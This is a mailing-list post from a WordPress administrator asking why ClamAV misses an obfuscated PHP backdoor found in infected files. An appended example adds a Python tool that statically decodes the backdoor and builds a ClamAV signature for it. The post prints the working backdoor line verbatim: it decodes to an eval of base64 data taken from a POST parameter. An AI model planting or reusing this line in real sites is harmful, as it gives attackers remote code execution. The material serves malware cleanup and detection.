Hi folks,

I'm in the process of cleaning up an infected WordPress website and am finding a number of files that contain

<?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>

inserted at the top of the file. Surely this is something pretty simple to catch? I'm scanning the docroot nightly, and freshclam is up to date... Output from a just-run freshclam:

# freshclam
ClamAV update process started at Wed Mar 25 08:38:55 2015
main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60, builder: neo)
Downloading daily-20233.cdiff [100%]
Downloading daily-20234.cdiff [100%]
daily.cld updated (version: 20234, sigs: 1357485, f-level: 63, builder: jesler)
bytecode.cld is up to date (version: 247, sigs: 41, f-level: 63, builder: dgoddard)
Database updated (3781751 signatures) from db.au.clamav.net (IP: 117.104.160.194)

I'm finding them by searching for the string "PCT4BA6ODSE".

Shouldn't this be in there already? If there is a process to add this, can someone please point me to the docs?

Thanks,

Steve

--
Steve Holdoway BSc(Hons) MIITP
http://www.greengecko.co.nz
Linkedin: http://www.linkedin.com/in/steveholdoway
Skype: sholdowa
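
Added example, not part of the original post and not ClamAV project code: a static resolver for the character-index obfuscation in the sample above, which never executes the PHP, plus a helper that formats a local ClamAV body signature (.ndb) for the marker string. The names resolve, is_suspicious and ndb_signature, the SUSPICIOUS list and the signature name used in the usage note are assumptions made for illustration.

```python
import re

# Sample from the post above, held as inert text and never executed.
SAMPLE = r'''<?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>'''

ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')   # $sF="...";
BUILD = re.compile(r'\$(\w+)\s*=\s*(strtolower|strtoupper)\(((?:\$\w+\[\d+\]\.?)+)\)')
INDEX = re.compile(r'\$(\w+)\[(\d+)\]')               # $sF[4]

# Illustrative (assumed) list of decoded names worth flagging next to eval().
SUSPICIOUS = {"base64_decode", "gzinflate", "str_rot13",
              "_POST", "_GET", "_REQUEST", "_COOKIE"}


def resolve(php):
    """Return {variable: string} for names built by indexing a lookup string."""
    tables = dict(ASSIGN.findall(php))
    decoded = {}
    for var, func, expr in BUILD.findall(php):
        chars = []
        for src, idx in INDEX.findall(expr):
            table = tables.get(src, "")
            if int(idx) >= len(table):
                break          # index outside the lookup string: skip this one
            chars.append(table[int(idx)])
        else:
            text = "".join(chars)
            decoded[var] = text.lower() if func == "strtolower" else text.upper()
    return decoded


def is_suspicious(php):
    """True when eval() appears alongside a hidden decoder or request array."""
    return "eval(" in php and bool(SUSPICIOUS & set(resolve(php).values()))


def ndb_signature(name, marker):
    """Format a ClamAV .ndb line: Name:TargetType:Offset:HexSignature.
    Target type 0 matches any file; offset * matches anywhere in the file."""
    return f"{name}:0:*:{marker.encode().hex()}"


if __name__ == "__main__":
    print(resolve(SAMPLE))
    print(is_suspicious(SAMPLE))
    print(ndb_signature("Local.PHP.Backdoor.PCT4BA6ODSE", "PCT4BA6ODSE"))
```

On the sample, the resolver shows that $s21 and $s20 decode to base64_decode and _POST, so the inserted line evaluates base64-decoded data from the request parameter na04af1. A signature on the marker string alone only matches this variant, since the lookup string can change between infections.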